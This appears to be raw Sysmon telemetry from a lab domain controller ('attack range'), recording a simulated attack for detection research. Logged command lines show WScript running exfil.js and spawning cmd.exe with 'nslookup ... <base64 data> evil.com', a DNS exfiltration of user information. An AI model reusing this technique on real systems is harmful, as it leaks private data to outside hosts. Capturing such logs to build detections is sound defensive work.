14:16:22.164{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.164{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.164{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.164{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.164{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-583F-000000005F02}5696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.164{2E1864BB-17B6-629A-563F-000000005F02}66883308C:\Windows\system32\cmd.exe{2E1864BB-17B6-629A-583F-000000005F02}5696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.171{2E1864BB-17B6-629A-583F-000000005F02}5696C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B6-629A-563F-000000005F02}6688C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgcrchj.tmp 2>&1 10341000x8000000000000000197728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.117{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-573F-000000005F02}7668C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.117{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-573F-000000005F02}7668C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.101{2E1864BB-17B6-629A-573F-000000005F02}76681104C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-563F-000000005F02}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000197725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.535{00000000-0000-0000-0000-000000000000}1496<unknown process>-udptruefalse127.0.0.1-52438-false127.0.0.1-53domain 354300x8000000000000000197724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.414{00000000-0000-0000-0000-000000000000}7184<unknown process>-udpfalsefalse127.0.0.1-52437-false127.0.0.1-53domain 354300x8000000000000000197723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.414{00000000-0000-0000-0000-000000000000}7184<unknown process>-udptruefalse127.0.0.1-52437-false127.0.0.1-53domain 354300x8000000000000000197722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.414{00000000-0000-0000-0000-000000000000}7184<unknown process>-udpfalsefalse127.0.0.1-52436-false127.0.0.1-53domain 354300x8000000000000000197721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.413{00000000-0000-0000-0000-000000000000}7184<unknown process>-udptruefalse127.0.0.1-52436-false127.0.0.1-53domain 354300x8000000000000000197720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.413{00000000-0000-0000-0000-000000000000}7184<unknown process>-udpfalsefalse127.0.0.1-52435-false127.0.0.1-53domain 354300x8000000000000000197719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.413{00000000-0000-0000-0000-000000000000}7184<unknown process>-udptruefalse127.0.0.1-52435-false127.0.0.1-53domain 354300x8000000000000000197718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.297{00000000-0000-0000-0000-000000000000}4336<unknown process>-udptruefalse127.0.0.1-52432-false127.0.0.1-53domain 354300x8000000000000000197717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.193{00000000-0000-0000-0000-000000000000}7428<unknown process>-udpfalsefalse127.0.0.1-52431-false127.0.0.1-53domain 354300x8000000000000000197716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.193{00000000-0000-0000-0000-000000000000}7428<unknown process>-udptruefalse127.0.0.1-52431-false127.0.0.1-53domain 354300x8000000000000000197715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.193{00000000-0000-0000-0000-000000000000}7428<unknown process>-udpfalsefalse127.0.0.1-52430-false127.0.0.1-53domain 354300x8000000000000000197714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.193{00000000-0000-0000-0000-000000000000}7428<unknown process>-udptruefalse127.0.0.1-52430-false127.0.0.1-53domain 354300x8000000000000000197713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.193{00000000-0000-0000-0000-000000000000}7428<unknown process>-udpfalsefalse127.0.0.1-52429-false127.0.0.1-53domain 354300x8000000000000000197712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.192{00000000-0000-0000-0000-000000000000}7428<unknown process>-udptruefalse127.0.0.1-52429-false127.0.0.1-53domain 354300x8000000000000000197711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.056{00000000-0000-0000-0000-000000000000}3396<unknown process>-udpfalsefalse127.0.0.1-52428-false127.0.0.1-53domain 354300x8000000000000000197710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.056{00000000-0000-0000-0000-000000000000}3396<unknown process>-udpfalsefalse127.0.0.1-52427-false127.0.0.1-53domain 354300x8000000000000000197709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.056{00000000-0000-0000-0000-000000000000}3396<unknown process>-udptruefalse127.0.0.1-52427-false127.0.0.1-53domain 354300x8000000000000000197708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.055{00000000-0000-0000-0000-000000000000}3396<unknown process>-udpfalsefalse127.0.0.1-52426-false127.0.0.1-53domain 10341000x8000000000000000197707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.085{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-573F-000000005F02}7668C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.081{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-563F-000000005F02}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.081{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.081{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.081{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.081{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.081{2E1864BB-17A1-629A-783D-000000005F02}55526520C:\Windows\System32\WScript.exe{2E1864BB-17B6-629A-563F-000000005F02}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.081{2E1864BB-17B6-629A-563F-000000005F02}6688C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgcrchj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.069{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlesblte.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.018{2E1864BB-17B5-629A-543F-000000005F02}23166224C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-553F-000000005F02}4996C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.002{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-553F-000000005F02}4996C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.002{2E1864BB-17B5-629A-533F-000000005F02}20768020C:\Windows\system32\cmd.exe{2E1864BB-17B6-629A-553F-000000005F02}4996C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.013{2E1864BB-17B6-629A-553F-000000005F02}4996C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A 